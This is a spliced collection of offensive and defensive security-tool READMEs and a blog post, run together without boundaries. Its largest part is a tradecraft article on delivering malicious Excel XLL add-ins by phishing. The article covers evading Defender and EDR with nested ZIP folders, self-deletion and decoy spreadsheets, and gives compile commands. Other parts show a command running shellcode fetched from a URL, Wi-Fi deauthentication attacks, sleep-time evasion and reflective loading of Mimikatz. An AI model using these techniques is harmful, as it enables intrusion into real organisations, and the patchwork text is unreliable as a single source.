Let's suppose you have a date/date-time field, and you want to set it to 10 days from now. You can do this by setting this as a value T(java.time.OffsetDateTime).now().plusDays(10)
. This will return an ISO compliant time in UTC format.
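Illustratively, a rough Python equivalent of that SpEL expression (not how CATS evaluates it internally) would be:

```python
from datetime import datetime, timedelta, timezone

# Rough Python equivalent of the SpEL expression
# T(java.time.OffsetDateTime).now().plusDays(10): an ISO-compliant
# timestamp ten days from now, in UTC.
ten_days_from_now = (datetime.now(timezone.utc) + timedelta(days=10)).isoformat()
print(ten_days_from_now)
```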
A functionalFuzzer
using this can look like:
/path:
testNumber:
description: Short description of the test
prop: value
prop#subprop: "T(java.time.OffsetDateTime).now().plusDays(10)"
prop7:
- value1
- value2
- value3
oneOfSelection:
element#type: "Value"
expectedResponseCode: HTTP_CODE
httpMethod: HTTP_METHOD
You can also check the responses using a similar syntax, also accounting for the actual values returned in the response. This is a syntax that can test whether a returned date is after the current date: T(java.time.LocalDate).now().isBefore(T(java.time.LocalDate).parse(expiry.toString())). It will check whether the expiry field returned in the JSON response, parsed as a date, is after the current date.
The syntax of dynamically setting dates is compliant with the Spring Expression Language specs.
If you need to run CATS behind a proxy, you can supply the following arguments: --proxyHost
and --proxyPort
. A typical run with proxy settings on localhost:8080
will look as follows:
> cats --contract=YAML_FILE --server=SERVER_URL --proxyHost=localhost --proxyPort=8080
CATS supports any form of HTTP header(s) based authentication (basic auth, OAuth, custom JWT, apiKey, etc.) using the headers mechanism. You can supply the specific HTTP header name and value and apply them to all endpoints. Additionally, basic auth is also supported using the --basicauth=USR:PWD argument.
By default, CATS trusts all server certificates and doesn't perform hostname verification.
For two-way SSL you can specify a JKS file (Java Keystore) that holds the client's private key using the following arguments:
- --sslKeystore: location of the JKS keystore holding the certificates used when authenticating calls using one-way or two-way SSL
- --sslKeystorePwd: the password of the sslKeystore
- --sslKeyPwd: the password of the private key within the sslKeystore
For details on how to load the certificate and private key into a Java Keystore you can use this guide: https://mrkandreev.name/blog/java-two-way-ssl/.
When using the native binaries (not the uberjar) there might be issues when using dynamic values in the CATS files. This is due to the fact that GraalVM only bundles whatever it can discover at compile time. The following classes are currently supported:
java.util.Base64.Encoder.class, java.util.Base64.Decoder.class, java.util.Base64.class, org.apache.commons.lang3.RandomUtils.class, org.apache.commons.lang3.RandomStringUtils.class,
org.apache.commons.lang3.DateFormatUtils.class, org.apache.commons.lang3.DateUtils.class,
org.apache.commons.lang3.DurationUtils.class, java.time.LocalDate.class, java.time.LocalDateTime.class, java.time.OffsetDateTime.class
At this moment, CATS only works with OpenAPI specs and has limited functionality using template payloads through the cats fuzz ...
subcommand.
The Fuzzers have the following support for media types and HTTP methods:
- media types: application/json and application/x-www-form-urlencoded only
- HTTP methods: POST, PUT, PATCH, GET and DELETE
If a response contains a free Map specified using the additionalProperties tag, CATS will issue a WARN-level log message, as it won't be able to validate that the response matches the schema.
CATS uses RgxGen in order to generate Strings based on regexes. This has certain limitations mostly with complex patterns.
All custom files that can be used by CATS (functionalFuzzerFile
, headers
, refData
, etc.) are in YAML format. When setting or getting values to/from JSON for input and/or output variables, you must use JsonPath syntax with either # or . as separators. You can find some selector examples here: JsonPath.
Please refer to CONTRIBUTING.md.
Frequency Independent SDR-based Signal Understanding and Reverse Engineering
FISSURE is an open-source RF and reverse engineering framework designed for all skill levels with hooks for signal detection and classification, protocol discovery, attack execution, IQ manipulation, vulnerability analysis, automation, and AI/ML. The framework was built to promote the rapid integration of software modules, radios, protocols, signal data, scripts, flow graphs, reference material, and third-party tools. FISSURE is a workflow enabler that keeps software in one location and allows teams to effortlessly get up to speed while sharing the same proven baseline configuration for specific Linux distributions.
The framework and tools included with FISSURE are designed to detect the presence of RF energy, understand the characteristics of a signal, collect and analyze samples, develop transmit and/or injection techniques, and craft custom payloads or messages. FISSURE contains a growing library of protocol and signal information to assist in identification, packet crafting, and fuzzing. Online archive capabilities exist to download signal files and build playlists to simulate traffic and test systems.
The friendly Python codebase and user interface allows beginners to quickly learn about popular tools and techniques involving RF and reverse engineering. Educators in cybersecurity and engineering can take advantage of the built-in material or utilize the framework to demonstrate their own real-world applications. Developers and researchers can use FISSURE for their daily tasks or to expose their cutting-edge solutions to a wider audience. As awareness and usage of FISSURE grows in the community, so will the extent of its capabilities and the breadth of the technology it encompasses.
Supported
There are two branches within FISSURE to make file navigation easier and reduce code redundancy. The Python2_maint-3.7 branch contains a codebase built around Python2, PyQt4, and GNU Radio 3.7, while the Python3_maint-3.8 branch is built around Python3, PyQt5, and GNU Radio 3.8.
Operating System | FISSURE Branch |
---|---|
Ubuntu 18.04 (x64) | Python2_maint-3.7 |
Ubuntu 18.04.5 (x64) | Python2_maint-3.7 |
Ubuntu 18.04.6 (x64) | Python2_maint-3.7 |
Ubuntu 20.04.1 (x64) | Python3_maint-3.8 |
Ubuntu 20.04.4 (x64) | Python3_maint-3.8 |
In-Progress (beta)
Operating System | FISSURE Branch |
---|---|
Ubuntu 22.04 (x64) | Python3_maint-3.8 |
Note: Certain software tools do not work for every OS. Refer to Software And Conflicts
Installation
git clone https://github.com/ainfosec/fissure.git
cd FISSURE
git checkout <Python2_maint-3.7> or <Python3_maint-3.8>
./install
This will automatically install PyQt software dependencies required to launch the installation GUIs if they are not found.
Next, select the option that best matches your operating system (should be detected automatically if your OS matches an option).
Python2_maint-3.7 | Python3_maint-3.8 |
---|---|
It is recommended to install FISSURE on a clean operating system to avoid existing conflicts. Select all the recommended checkboxes (Default button) to avoid errors while operating the various tools within FISSURE. There will be multiple prompts throughout the installation, mostly asking for elevated permissions and user names. If an item contains a "Verify" section at the end, the installer will run the command that follows and highlight the checkbox item green or red depending on if any errors are produced by the command. Checked items without a "Verify" section will remain black following the installation.
Usage
fissure
Refer to the FISSURE Help menu for more details on usage.
Components
Capabilities
Signal Detector
IQ Manipulation
Pattern Recognition
Attacks
Fuzzing
Signal Playlists
Image Gallery
Packet Crafting
Scapy Integration
CRC Calculator
Logging
FISSURE comes with several helpful guides to become familiar with different technologies and techniques. Many include steps for using various tools that are integrated into FISSURE.
Suggestions for improving FISSURE are strongly encouraged. Leave a comment in the Discussions page if you have any thoughts regarding the following:
Contributions to improve FISSURE are crucial to expediting its development. Any contributions you make are greatly appreciated. If you wish to contribute through code development, please fork the repo and create a pull request:
1. Create your feature branch (git checkout -b feature/AmazingFeature)
2. Commit your changes (git commit -m 'Add some AmazingFeature')
3. Push to the branch (git push origin feature/AmazingFeature)
4. Open a pull request
Creating Issues to bring attention to bugs is also welcomed.
Contact Assured Information Security, Inc. (AIS) Business Development to propose and formalize any FISSURE collaboration opportunities–whether that is through dedicating time towards integrating your software, having the talented people at AIS develop solutions for your technical challenges, or integrating FISSURE into other platforms/applications.
GPL-3.0
For license details, see LICENSE file.
Follow on Twitter: @FissureRF, @AinfoSec
Chris Poore - Assured Information Security, Inc. - poorec@ainfosec.com
Business Development - Assured Information Security, Inc. - bd@ainfosec.com
Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions to this project.
A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
Sleep and obfuscation methods are well known in the maldev community. Different implementations share the objective of hiding from memory scanners while sleeping, usually by changing page protections and even adding cool features like encrypting the shellcode. But there is another important piece to hide besides our shellcode: the current execution thread. Spoofing the stack is cool, but after thinking a little about it I thought that there is no need to spoof the stack… if there is no stack :)
The usability of this technique is left to the reader to assess, but in any case, I think it is a cool way to review some topics, and learn some maldev for those who, like me, are starting in this world.
The main implementation shown here holds everything we need to take out of the stack in the data section, as global variables, but an implementation moving everything to the heap will be published soon. It aims to show some key modifications that need to be made to make this code position-independent (PIC) and injectable.
This repository is mirrored between GitHub and GitLab.
With Microsoft's recent announcement regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have begun aggressively exploring other options to achieve user driven access (UDA). There are several considerations to be weighed and balanced when looking for a viable phishing-for-access method:
These are the major questions, however there are certainly more. Things get more complex as you realize that these factors compound each other; for example, if a client has a web proxy that prohibits the download of executables or DLL's, you may need to stick your payload inside a container (ZIP, ISO, etc). Doing so can present further issues down the road when it comes to detection. More robust defenses require more complex combinations of techniques to defeat.
This article will be written with a fictional target organization in mind; this organization has employed several defensive measures including email filtering rules, blacklisting certain file types from being downloaded, application whitelisting on endpoints, and Microsoft Defender for Endpoint as an EDR solution.
Real organizations may employ none of these, some, or even more defenses which can simplify or complicate the techniques outlined in this research. As always, know your target.
XLL's are DLL's, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal Excel documents.
XLL's provide a very attractive option for UDA given that they are executed by Microsoft Excel, a very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL's can be written in C, C++, or C# which provides a great deal more flexibility and power (and sanity) than VBA macros which further makes them a desirable choice.
The downside of course is that there are very few legitimate uses for XLL's, so it SHOULD be a very easy box to check for organizations to block the download of that file extension through both email and web download. Sadly many organizations are years behind the curve and as such XLL's stand to be a viable method of phishing for some time.
There are a series of different events that can be used to execute code within an XLL, the most notable of which is xlAutoOpen. The full list may be seen here:
Upon double clicking an XLL, the user is greeted by this screen:
This single dialog box is all that stands between the user and code execution; with fairly thin social engineering, code execution is all but assured.
Something that must be kept in mind is that XLL's, being executables, are architecture specific. This means that you must know your target; the version of Microsoft Office/Excel that the target organization utilizes will (usually) dictate what architecture you need to build your payload for.
There is a pretty clean break in Office versions that can be used as a rule of thumb:
Office 2016 or earlier: x86
Office 2019 or later: x64
It should be noted that it is possible to install the other architecture for each product, however these are the default architectures installed and in most cases this should be a reliable way to make a decision about which architecture to roll your XLL for. Of course depending on the delivery method and pretexting used as part of the phishing campaign, it is possible to provide both versions and rely on the victim to select the appropriate version for their system.
The XLL payload that was built during this research was based on this project by edparcell. His repository has good instructions on getting started with XLL's in Visual Studio, and I used his code as a starting point to develop a malicious XLL file.
A notable deviation from his repository is that should you wish to create your own XLL project, you will need to download the latest Excel SDK and then follow the instructions on the previously linked repo using this version as opposed to the 2010 version of the SDK mentioned in the README.
Delivery of the payload is a serious consideration in context of UDA. There are two primary methods we will focus on:
Either via attaching a file or including a link to a website where a file may be downloaded, email is a critical part of the UDA process. Over the years many organizations (and email providers) have matured and enforced rules to protect users and organizations from malicious attachments. Mileage will vary, but organizations now have the capability to:
Fuzzing an organization's email rules can be an important part of an engagement, however care must always be taken so as to not tip one's hand that a Red Team operation is ongoing and that information is actively being gathered.
For the purposes of this article, it will be assumed that the target organization has robust email attachment rules that prevent the delivery of an XLL payload. We will pivot and look at web delivery.
Email will still be used in this attack vector, however rather than sending an attachment it will be used to send a link to a website. Web proxy rules and network mitigations controlling allowed file download types can differ from those enforced in regards to email attachments. For the purposes of this article, it is assumed that the organization prevents the download of executable files (MZ headers) from the web. This being the case, it is worth exploring packers/containers.
The premise is that we might be able to stick our executable inside another file type and smuggle it past the organization's policies. A major consideration here is native support for the file type; 7Z files for example cannot be opened by Windows without installing third party software, so they are not a great choice. Formats like ZIP, ISO, and IMG are attractive choices because they are supported natively by Windows, and as an added bonus they add very few extra steps for the victim.
The organization unfortunately blocks ISO's and IMG's from being downloaded from the web; additionally, because they employ Data Loss Prevention (DLP) users are unable to mount external storage devices, which ISO's and IMG's are considered.
Luckily for us, even though the organization prevents the download of MZ-headered files, it does allow the download of zip files containing executables. These zip files are actively scanned for malware, to include prompting the user for the password for password-protected zip files; however because the executable is zipped it is not blocked by the otherwise blanket deny for MZ files.
Zip files were chosen as a container for our XLL payload because:
Conveniently, double clicking a ZIP file on Windows will open that zip file in File Explorer:
Less conveniently, double clicking the XLL file from the zipped location triggers Windows Defender; even using the stock project from edparcell that doesn't contain any kind of malicious code.
Looking at the Windows Defender alert we see it is just a generic "Wacatac" alert:
However there is something odd; the file it identified as malicious was in c:\users\user\Appdata\Local\Temp\Temp1_ZippedXLL.zip, not C:\users\user\Downloads\ZippedXLL\ where we double clicked it. Looking at the Excel instance in ProcessExplorer shows that Excel is actually running the XLL from appdata\local\temp, not from the ZIP file that it came in:
This appears to be a wrinkle associated with ZIP files, not XLL's. Opening a TXT file from within a zip using notepad also results in the TXT file being copied to appdata\local\temp and opened from there. While opening a text file from this location is fine, Defender seems to identify any sort of actual code execution in this location as malicious.
If a user were to extract the XLL from the ZIP file and then run it, it will execute without any issue; however there is no way to guarantee that a user does this, and we really can't roll the dice on popping AV/EDR should they not extract it. Besides, double clicking the ZIP and then double clicking the XLL is far simpler and a victim is far more prone to complete those simple actions than go to the trouble of extracting the ZIP.
This problem caused me to begin considering a different payload type than XLL; I began exploring VSTO's, which are Visual Studio Templates for Office. I highly encourage you to check out that article.
VSTO's ultimately call a DLL which can either be located locally with the .XLSX that initiates everything, or hosted remotely and downloaded by the .XLSX via http/https. The local option provides no real advantages (and in fact several disadvantages in that there are several more files associated with a VSTO attack), and the remote option unfortunately requires a code signing certificate or for the remote location to be a trusted network. Not having a valid code signing cert, VSTO's do not mitigate any of the issues in this scenario that our XLL payload is running into.
We really seem to be backed into a corner here. Running the XLL itself is fine, however the XLL cannot be delivered by itself to the victim either via email attachment or web download due to organization policy. The XLL needs to be packaged inside a container, however due to DLP formats like ISO, IMG, and VHD are not viable. The victim needs to be able to open the container natively without any third party software, which really leaves ZIP as the option; however as discussed, running the XLL from a zipped folder results in it being copied and ran from appdata\local\temp which flags AV.
I spent many hours brainstorming and testing things, going down the VSTO rabbit hole, exploring all conceivable options until I finally decided to try something so dumb it just might work.
This time I created a folder, placed the XLL inside it, and then zipped the folder:
Clicking into the folder reveals the XLL file:
Double clicking the XLL shows the Add-In prompt from Excel. Note that the XLL is still copied to appdata\local\temp, however there is an additional layer due to the extra folder that we created:
Clicking enable executes our code without flagging Defender:
Nice! Code execution. Now what?
The pretexting involved in getting a victim to download and execute the XLL will vary wildly based on the organization and delivery method; themes might include employee salary data, calculators for compensation based on skillset, information on a project, an attendee roster for an event, etc. Whatever the lure, our attack will be a lot more effective if we actually provide the victim with what they have been promised. Without follow through, victims may become suspicious and report the document to their security teams which can quickly give the attacker away and curtail access to the target system.
The XLL by itself will just leave a blank Excel window after our code is done executing; it would be much better for us to provide the Excel Spreadsheet that the victim is looking for.
We can embed our XLSX as a byte array inside the XLL; when the XLL executes, it will drop the XLSX to disk beside the XLL after which it will be opened. We will name the XLSX the same as the XLL, the only difference being the extension.
Given that our XLL is written in C, we can bring in some of the capabilities from a previous writeup I did on Payload Capabilities in C, namely Self-Deletion. Combining these two techniques results in the XLL being deleted from disk and the XLSX of the same name being dropped in its place. To the undiscerning eye, it will appear that the XLSX was there the entire time.
Unfortunately the location where the XLL is deleted and the XLSX dropped is the appdata\local\temp folder, not the original ZIP; to address this we can create a second ZIP containing the XLSX alone and also read it into a byte array within the XLL. On execution, in addition to the aforementioned actions, the XLL could try to locate the original ZIP file in c:\users\victim\Downloads\ and delete it before dropping the second ZIP containing just the XLSX in its place. This could of course fail if the user saved the original ZIP in a different location or under a different name, however in many/most cases it should drop in the user's downloads folder automatically.
This screenshot shows in the lower pane the temp folder created in appdata\local\temp containing the XLL and the dropped XLSX, while the top pane shows the original File Explorer window from which the XLL was opened. Notice in the lower pane that the XLL has size 0. This is because it deleted itself during execution, however until the top pane is closed the XLL file will not completely disappear from the appdata\local\temp location. Even if the victim were to click the XLL again, it is now inert and does not really exist.
Similarly, as soon as the victim backs out of the opened ZIP in File Explorer (either by closing it or navigating to a different folder), should they click spreadsheet.zip again they will now find that the test folder contains importantdoc.xlsx; so the XLL has been removed and replaced by the harmless XLSX in both locations that it existed on disk.
This GIF demonstrates the download and execution of the XLL on an MDE trial VM. Note that for some reason Excel opens two instances here; on my home computer it only opened one, so not quite sure why that differs.
As always, we will ask "What does MDE see?"
A quick screenshot dump to prove that I did execute this on target and catch a beacon back on TestMachine11:
First off, zero alerts:
What does the timeline/event log capture?
Yikes. Truth be told I have no idea where the keylogging, encrypting, and decrypting credentials alerts are coming from as my code doesn't do any of that. Our actions sure look suspicious when laid out like this, but I will again comment on just how much data is collected by MDE on a single endpoint, let alone hundreds, thousands, or hundreds of thousands that an organization may have hooked into the EDR. So long as we aren't throwing any actual alerts, we are probably ok.
The moment most have probably been waiting for, I am providing a code sample of my developed XLL runner, limited to just those parts discussed here in the Tradecraft section. It will be on the reader to actually get the code into an XLL and implement it in conjunction with the rest of their runner. As always, do no harm, have permission to phish an organization, etc.
I have included the source code for a program that will ingest a file and produce hex which can be copied into the byte arrays defined in the snippet. Use this on the XLSX you wish to present to the user, as well as on the ZIP file containing the folder which holds that same XLSX, and store the output in the respective byte arrays. Compile this code using:
gcc -o ingestfile ingestfile.c
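The helper itself is C; purely for illustration, here is a hedged Python equivalent that produces the same kind of output, a C unsigned char array literal you can paste into the snippet (the names here are my own, not those from ingestfile.c):

```python
import sys

def to_c_array(data: bytes, name: str = "payload", width: int = 12) -> str:
    """Render raw bytes as a C unsigned char array literal plus a length variable."""
    hex_bytes = ["0x{:02x}".format(b) for b in data]
    rows = [", ".join(hex_bytes[i:i + width]) for i in range(0, len(hex_bytes), width)]
    body = ",\n    ".join(rows)
    return ("unsigned char {0}[{1}] = {{\n    {2}\n}};\n"
            "unsigned int {0}_len = {1};").format(name, len(data), body)

if __name__ == "__main__" and len(sys.argv) > 1:
    # usage: python ingestfile.py importantdoc.xlsx xlsx_bytes
    with open(sys.argv[1], "rb") as f:
        print(to_c_array(f.read(), sys.argv[2] if len(sys.argv) > 2 else "payload"))
```

Run it once for the XLSX and once for the ZIP, and paste each output into its matching byte array.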
I had some issues getting my XLLs to compile using MinGW on a Kali machine, so I thought I would post the commands here:
x64
x86_64-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB -o importantdoc.xll -s -Os -DUNICODE -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/
x86
i686-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/XLCALL32.LIB -o HelloWorldXll.xll -s -DUNICODE -Os -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/
After you compile you will want to make a new folder and copy the XLL into that folder. Then zip it using:
zip -r <myzipname>.zip <foldername>/
Note that in order for the tradecraft outlined in this post to work, you are going to need to match some variables in the code snippet to what you name the XLL and the zip file.
With the dominance of Office macros coming to a close, XLLs present an attractive option for phishing campaigns. With some creativity they can be used in conjunction with other techniques to bypass many layers of defenses implemented by organizations and security teams. Thank you for reading and I hope you learned something useful!
This was a learning-by-doing project on my side. Well-known techniques are used to build just another impersonation tool, with some improvements compared to other public tools. The code base was taken from:
A blog post with the introduction can be found here:
PS C:\temp> SharpImpersonation.exe list
PS C:\temp> SharpImpersonation.exe list elevated
PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>
PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>
PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>
PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
_____ ____ ____ _
/ ___// __ \____ ____ ___ / __ \(_)_____________ _ _____ _____
\__ \/ / / / __ \/ __ `__ \/ / / / / ___/ ___/ __ \ | / / _ \/ ___/
___/ / /_/ / /_/ / / / / / / /_/ / (__ ) /__/ /_/ / |/ / __/ /
/____/_____/\____/_/ /_/ /_/_____/_/____/\___/\____/|___/\___/_/
An easy-to-use Python tool to perform DNS recon with multiple options
It can be installed on any OS with Python 3
Manual installation
git clone https://github.com/D3Ext/SDomDiscover
cd SDomDiscover
pip3 install -r requirements.txt
One-liner
git clone https://github.com/D3Ext/SDomDiscover && cd SDomDiscover && pip3 install -r requirements.txt && python3 SDomDiscover.py
Common usages
To see the help panel and other parameters
python3 SDomDiscover.py -h
Main usage of the tool to dump the valid domains in the SSL certificate
python3 SDomDiscover.py -d example.com
Used to perform all the queries and reconnaissance
python3 SDomDiscover.py -d domain.com --all
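The tool's core trick of dumping the valid domains listed in a server's SSL certificate can be sketched with the standard library alone (the function names are mine, not SDomDiscover's):

```python
import socket
import ssl

def san_domains(cert: dict) -> list:
    """Pull DNS names out of the subjectAltName extension, in the dict
    format returned by ssl.SSLSocket.getpeercert()."""
    return [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]

def dump_cert_domains(domain: str, port: int = 443, timeout: float = 5.0) -> list:
    """Open a TLS connection and return the domains listed in the server certificate."""
    ctx = ssl.create_default_context()
    with socket.create_connection((domain, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=domain) as tls:
            return san_domains(tls.getpeercert())
```

dump_cert_domains("example.com") would typically return the base domain plus wildcard and sibling entries, which is exactly the seed list a subdomain recon tool wants.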
Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.
This tool is designed for educational and research purposes only. Only use it with explicit permission.
For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:
- Python 3: apt-get install python3
- dnsmasq: apt-get install dnsmasq
- hostapd-wpe: apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.
After installing the necessary packages, you can install the Python package requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.
For starting Pinecone, execute python3 pinecone.py
from within the project root folder:
root@kali:~/pinecone# python pinecone.py
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >
Pinecone is controlled via a Metasploit-like command-line interface. You can type help
to get the list of available commands, or help 'command'
to get more information about a specific command:
pinecone > help
Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias
Undocumented commands:
======================
back run stop
pinecone > help use
Usage: use module [-h]
Interact with the specified module.
positional arguments:
module module ID
optional arguments:
-h, --help show this help message and exit
Use the command use 'moduleID'
to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:
pinecone > use
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >
Every module has options that can be seen by typing help run
or run --help
when the module is activated. Most modules have default values for their options (check them before running):
pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]
optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)
When a module is activated, you can use the run [options...]
command to start its functionality. The modules provide feedback of their execution state:
pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...
If the module runs in the background (for example, scripts/infrastructure/ap), you can stop it using the stop
command while it is running. You can deactivate the current module with the back
command, or activate another module by issuing the use
command again. Shell commands may be executed with the shell
command or the !
shortcut:
pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md
Currently, Pinecone's reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs are stored in the tmp/ directory, also under the project root folder.
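The Metasploit-like use/run/back workflow shown in the transcripts above can be sketched with Python's built-in cmd module. The module ID, option name and prompts below mirror the session transcript; the class structure itself is illustrative, not Pinecone's actual implementation:

```python
import cmd

class ReconModule:
    """Toy stand-in for discovery/recon with a default option set."""
    id = "discovery/recon"
    options = {"iface": "wlan0"}

    def run(self, opts):
        return "[i] recon on monitor interface {}".format(opts["iface"])

class PineconeShell(cmd.Cmd):
    prompt = "pinecone > "

    def __init__(self, modules):
        super().__init__()
        self.modules = {m.id: m for m in modules}
        self.current = None

    def do_use(self, module_id):
        """use <moduleID>: activate a module and reflect it in the prompt."""
        if module_id in self.modules:
            self.current = self.modules[module_id]
            self.prompt = "pcn module({}) > ".format(module_id)
        else:
            print("[!] unknown module: {}".format(module_id))

    def do_run(self, _arg):
        """run: execute the active module with its default options."""
        if self.current:
            print(self.current.run(dict(self.current.options)))

    def do_back(self, _arg):
        """back: deactivate the current module."""
        self.current, self.prompt = None, "pinecone > "
```

Calling PineconeShell([ReconModule()]).cmdloop() gives the interactive prompt; cmd's built-in help and Tab completion come for free, which is presumably why this interface style (Pinecone actually builds on cmd2) is so common.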
PersistenceSniper is a PowerShell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. The script is also available on the PowerShell Gallery.
Why write such a tool, you might ask. Well, for starters, I tried looking around and did not find a tool which suited my particular use case: looking for known persistence techniques, automatically, across multiple machines, while also being able to quickly and easily parse and compare results. Sure, Sysinternals' Autoruns is an amazing tool and it's definitely worth using, but, given that it outputs results in non-standard formats and can't be run remotely unless you do some shenanigans with its command-line equivalent, I did not find it a good fit for me. Plus, some of the techniques I have implemented so far in PersistenceSniper have not been implemented into Autoruns yet, as far as I know. Anyway, if what you need is an easy-to-use, GUI-based tool with lots of already implemented features, Autoruns is the way to go; otherwise let PersistenceSniper have a shot, it won't miss it :)
Using PersistenceSniper is as simple as:
PS C:\> git clone https://github.com/last-byte/PersistenceSniper
PS C:\> Import-Module .\PersistenceSniper\PersistenceSniper\PersistenceSniper.psd1
PS C:\> Find-AllPersistence
If you need a detailed explanation of how to use the tool or which parameters are available and how they work, PersistenceSniper's Find-AllPersistence
supports Powershell's help features, so you can get detailed, updated help by using the following command after importing the module:
Get-Help -Name Find-AllPersistence -Full
PersistenceSniper's Find-AllPersistence
returns an array of objects of type PSCustomObject with the following properties:
PS C:\> Find-AllPersistence | Where-Object "Access Gained" -EQ "System"
Of course, PersistenceSniper being a PowerShell-based tool, some cool tricks can be performed, like piping its output to Out-GridView
in order to have a GUI-based table to interact with.
As already introduced, Find-AllPersistence
outputs an array of Powershell Custom Objects. Each object has the following properties, which can be used to filter, sort and better understand the different techniques the function looks for:
Running Find-AllPersistence
without a -ComputerName
parameter makes PersistenceSniper run only on the local machine; otherwise it will run on the remote computer(s) you specify.

Let's face it, hunting for persistence techniques also comes with having to deal with a lot of false positives. This happens because, while some techniques are almost never legitimately used, many indeed are used by legit software which needs to autorun on system boot or user login.
This poses a challenge, which in many environments can be tackled by creating a CSV file containing known false positives. If your organization deploys systems using something like a golden image, you can run PersistenceSniper on a system you just created, get a CSV of the results and use it to filter out results on other machines. This approach comes with the following benefits:
Find-AllPersistence
comes with parameters allowing direct output of the findings to a CSV file, while also being able to take a CSV file as input and diff the results.
PS C:\> Find-AllPersistence -DiffCSV false_positives.csv
One cool way to use PersistenceSniper, suggested by my mate Riccardo, is to use it incrementally: you could set up a Scheduled Task which runs every X hours, takes in the output of the previous iteration through the -DiffCSV
parameter and outputs the results to a new CSV. By keeping track of the incremental changes, you should be able to spot, within a reasonably small time frame, new persistences implanted on the machine you are monitoring.
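PersistenceSniper itself is PowerShell; purely to illustrate the -DiffCSV idea, here is a sketch in Python of diffing a new result set against a known-good baseline (the column names used as keys are hypothetical):

```python
import csv

def new_findings(baseline_csv: str, current_csv: str,
                 key_fields=("Technique", "Path")) -> list:
    """Return rows in current_csv whose key columns do not appear in baseline_csv."""
    def rows(path):
        with open(path, newline="") as f:
            return list(csv.DictReader(f))
    known = {tuple(r[k] for k in key_fields) for r in rows(baseline_csv)}
    return [r for r in rows(current_csv)
            if tuple(r[k] for k in key_fields) not in known]
```

Feeding each run's output back in as the next run's baseline is what makes the incremental Scheduled Task approach work: only never-before-seen persistences surface.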
The topic of persistence, especially on Windows machines, is one of those which see new discoveries basically every other week. Given the sheer amount of persistence techniques found so far by researchers, I am still in the process of implementing them. So far the following 31 techniques have been implemented successfully:
The techniques implemented in this script have already been published by skilled researchers around the globe, so it's right to give credit where credit's due. This project wouldn't be around if it weren't for:
I'd also like to give credits to my fellow mates at @APTortellini, in particular Riccardo Ancarani, for the flood of ideas that helped it grow from a puny text-oriented script to a full-fledged Powershell tool.
This project is under the CC0 1.0 Universal license. TL;DR: you can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission.
A Nim implementation of reflective PE-Loading from memory. The base for this code was taken from RunPE-In-Memory - which I ported to Nim.
You'll need to install the following dependencies:
nimble install ptr_math winim
I tested this with Nim version 1.6.2 only, so use that version; I cannot guarantee it is error-free with other versions.
If you want to pass arguments at runtime, or don't want to pass arguments at all, compile via:
nim c NimRunPE.nim
If you want to hardcode custom arguments modify const exeArgs
to your needs and compile with:
nim c -d:args NimRunPE.nim
- this was contributed by @glynx, thanks!
The technique itself is pretty old, but I didn't find a Nim implementation yet. So this has changed now. :)
If you plan to load e.g. Mimikatz with this technique, make sure to compile a version from source on your own, as the release binaries don't accept arguments after being loaded reflectively by this loader. Why? I really don't know; it's strange, but a fact. If you compile it on your own it will still work:
My private Packer is also weaponized with this technique - but all Win32 functions are replaced with Syscalls there. That makes the technique stealthier.
Graph Crawler is the most powerful automated testing toolkit for any GraphQL endpoint.
NEW: Can search for endpoints for you using Escape Technology's powerful Graphinder tool. Just point it towards a domain and add the '-e' option and Graphinder will do subdomain enumeration + search popular directories for GraphQL endpoints. After all this GraphCrawler will take over and work through each find.
It will run through and check if mutation is enabled, check for any sensitive queries available, such as users and files, and it will also test any easy queries it finds to see if authentication is required.
If introspection is not enabled on the endpoint it will check if it is an Apollo Server and then can run Clairvoyance to brute force and grab the suggestions to try to build the schema ourselves. (See the Clairvoyance project for greater details on this). It will then score the findings 1-10 with 10 being the most critical.
If you want to dig deeper into the schema you can also use graphql-path-enum to look for paths to certain types, like user IDs, emails, etc.
